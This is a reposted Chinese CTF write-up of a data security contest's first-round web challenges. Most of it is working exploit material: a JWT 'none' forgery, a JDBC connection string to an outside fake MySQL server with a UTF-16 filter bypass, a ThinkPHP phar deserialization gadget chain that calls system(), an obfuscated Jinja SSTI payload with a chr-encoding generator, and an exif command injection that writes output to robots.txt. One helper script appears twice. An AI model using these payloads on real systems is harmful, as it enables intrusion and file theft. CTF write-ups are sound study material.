返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >首届数据安全大赛初赛web
  • 753
分享到

首届数据安全大赛初赛web

php安全javascript前端linux 2023-09-04 10:09:48 753人浏览 安东尼
摘要

文章目录 easy_nodeeasy_webeasy_phar刮刮乐my_cloud easy_node 访问src得到源码 第一步需要伪造admin用户 可以看到都是通过Jwt进行加密解

文章目录

easy_node

访问src得到源码

第一步需要伪造admin用户

可以看到都是通过Jwt进行加密解密

很容易想到jwt的几种攻击方式,可以参考下文章https://blog.csdn.net/miuzzx/article/details/111936737

首先试下改为none

var jwt = require('JSONWEBtoken') data={username:'admin'} //生成token var token = jwt.sign(data, '', {alGorithm: 'none'}) console.log(token);

一开始还以为是原型链污染,然后发现不太一样。
类似于一个套娃,如果键值是Object,又会进行一次赋值。
所以我们可以把flag放入内层中。
最终payload
{"properties":{"0":["0","1","flag"],"length":"1"}}

easy_web

前端源码泄露漏洞并用source map文件还原

参考文章https://blog.csdn.net/qq_44930903/article/details/124257571

访问app.ddeec4b4.js.map下载到

reverse-sourcemap -o aaa -v app.ddeec4b4.js.map

得到文件夹src,在api/user.js中得到可以地址
在这里插入图片描述
进入如下页面
在这里插入图片描述
可以进行数据库连接,很容易想到通过jdbc读文件,或者反序列化
项目地址Https://GitHub.com/fnmsd/Mysql_Fake_Server
不过过滤了一些关键词
题目提示用utf16绕过,具体代码如下

import requestsimport urllib.parseurl = 'http://eci-2ze6f7fy0tfQts9ijl92.cloudeci1.ichunqiu.com:8888/connect'payload ="""jdbc:mysql://(host=101.34.94.44,port=3307,queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor,%61llowLoadLocalInfile=yes)/db"""data={"xmlString":payload.encode('utf-16le')}print(data)r = requests.post(url,data=data)print(r.text)

easy_phar

该cms本身存在漏洞
参考文章https://github.com/MuYuCMS/MuYuCMS/issues/2
大概就是通过上传一个phar文件,然后再利用application/admin/controller/Update.PHP中的rfdirr触发phar反序列化。

因为后台没法进入所以尝试其他的文件上传方法。
找到public/static/admin/static/ueditor/php/controller.php,可以看到能够获取远程文件
在这里插入图片描述
本地测试可以成功下载远程图片文件,并且文件目录可知为
在这里插入图片描述
将恶意phar文件修改后缀后放入远程服务器
在这里插入图片描述
触发phar反序列化
在这里插入图片描述
poc

namespace think{    abstract class Model{        protected $append;        private $data;        function __construct(){            $this->append = ["aaaa"=>["123456"]];            $this->data = ["aaaa"=>new Request()];        }    }    class Request    {        protected $param;        protected $hook;        protected $filter;        protected $config;        function __construct(){            $this->filter = "system";            $this->config = ["var_ajax"=>''];            $this->hook = ["visible"=>[$this,"isAjax"]];            $this->param = ["cat /f*"];        }    }}namespace think\process\pipes{    use think\model\Pivot;    class windows    {        private $files;        public function __construct()        {            $this->files=[new Pivot()];        }    }}namespace think\model{    use think\Model;    class Pivot extends Model    {    }}namespace{    use think\process\pipes\Windows;    @unlink('shell.jpg');    $phar = new Phar("shell.phar"); //    $phar->startBuffering();    $phar -> setStub('GIF89a'.'');    $object = new Windows();    //$object ->haha= 'eval(@$_POST[\'a\']);';    // $object ->haha= 'phpinfo();';    $phar->setMetadata($object);     $phar->addFromString("a", "a"); //添加要压缩的文件        $phar->stopBuffering();        echo (base64_encode(serialize(new Windows())));}?>

刮刮乐

考察ssti,过滤了{{ _ 等一些字符

直接用我的珍藏payload

https://blog.csdn.net/miuzzx/article/details/112168039

可以看下369的payload

试了下反弹shell失败,估计是不出网,那直接把命令结果写到静态文件上

payload

{% set a=(()|select|string|list).pop(24)%}{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}{% set chr=x.chr%}{% set cmd=%}{%if x.exec(cmd)%}123{%endif%}

再通过下面的代码生成相对应的命令,补全到上面cmd位置

s='__import__("os").popen("cat /app/*> /app/static/CSS/headerLIne.css").read()'def ccchr(s):t=''for i in range(len(s)):if i<len(s)-1:t+='chr('+str(ord(s[i]))+')%2b'else:t+='chr('+str(ord(s[i]))+')'return tprint(ccchr(s))

再通过下面的代码生成相对应的命令,补全到上面cmd位置

s='__import__("os").popen("cat /app/*> /app/static/css/headerLIne.css").read()'def ccchr(s):t=''for i in range(len(s)):if i<len(s)-1:t+='chr('+str(ord(s[i]))+')%2b'else:t+='chr('+str(ord(s[i]))+')'return tprint(ccchr(s))

my_cloud

根据提示,利用弱口令admin/admin888进入后台。
发现存在备份文件,下载下来备份文件后,审计发现可疑代码
在这里插入图片描述

exif为可控内容,并且最后进入了shell_exec中。
提示中还有一句话注意到图片预览了吗,尝试看看逻辑呢
可以联想到和图片预览相关,而代码中检测了图片的content-type,应该就是上传文件时了。
从 generatePreview 猜测就是产生图片预览图的时候会生效,所以直接上传图片的同时进行抓包:
在这里插入图片描述
加入恶意语句:
GET /core/preview?fileId=838&c=0e31b19b118b00a431a6a4d38bca54e5&x=500&y=500&forceIcon=0&a=0&exif=;ls+/>/var/www/html/robots.txt;sleep+3
成功延时
在这里插入图片描述
访问 robots.txt 拿到结果:
在这里插入图片描述

来源地址:https://blog.csdn.net/miuzzx/article/details/127744431

--结束END--

本文标题: 首届数据安全大赛初赛web

本文链接: https://lsjlt.com/news/393338.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作